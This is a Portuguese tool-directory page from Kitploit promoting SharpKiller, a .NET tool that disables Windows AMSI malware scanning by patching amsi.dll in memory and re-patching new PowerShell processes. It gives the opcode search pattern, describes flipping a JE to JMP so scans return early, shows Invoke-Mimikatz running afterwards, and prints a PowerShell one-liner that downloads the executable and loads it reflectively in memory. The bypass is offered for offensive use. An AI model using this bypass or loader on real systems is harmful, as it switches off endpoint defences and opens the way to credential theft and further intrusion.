Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpKiller — Bypass vitalício de AMSI por @ZeroMemoryEx portado para o .NET Framework 4.8 | Kitploit
Ferramentas/GitHubGitHub/s1lkys/sharpkiller
Escalada de PrivilégiosExploraçãoEvasão de IDS/IPSPós-ExploraçãoRed TeamingDesenvolvimento de Payloads
GitHubs1lkys/sharpkiller

SharpKiller

Bypass vitalício de AMSI por @ZeroMemoryEx portado para o .NET Framework 4.8

Ver Repositório
35143há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpKiller

Bypass de AMSI vitalício AMSI-Killer por @ZeroMemoryEx portado para .NET Framework 4.8.

Obfuscação adicional necessária

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Recursos recém-integrados:

[ x ] - Verificação em tempo real de novos processos powershell a cada 0,5 segundos -> Corrige automaticamente novas instâncias do powershell

Compilando a solução

  • Defina sua plataforma explicitamente para x64 em Build > configuration manager

Como funciona?

Varredura de Opcode

  • obtemos o endereço exato da instrução de salto procurando o primeiro byte de cada instrução; essa técnica é eficaz mesmo diante de atualizações ou modificações no conjunto de dados de destino.

  • por exemplo:

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • o padrão de busca será assim:

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Patch

Antes do Patch

  • O programa testa o valor de RDX contra si mesmo. Se a comparação resultar em 0, o programa executa um salto para retornar. Caso contrário, o programa prossegue para avaliar a próxima instrução

    image

  • não conseguimos executar "Invoke-Mimikatz"

    image

Depois do Patch

  • corrigimos o primeiro byte e o alteramos de JE para JMP para que ele retorne diretamente

    Screenshot 2023-02-26 195848

    image

  • agora podemos executar "Invoke-Mimikatz"

Processos recém-criados

  • O Sharp-Killer corrigirá quaisquer processos Powershell recém-criados quase em tempo real.

Demonstração em vídeo

video

OneLiner para executar com reflexão

root@kitploit:~
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

Este erro ocorre ao usar o OneLiner mencionado?

Se você já viu esta mensagem e se perguntou sobre ela - bem-vindo à Interface AMSI do .NET! :-)

root@kitploit:~
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."
  • https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/

Referências:

  • https://github.com/ZeroMemoryEx/Amsi-Killer
Baixar ferramenta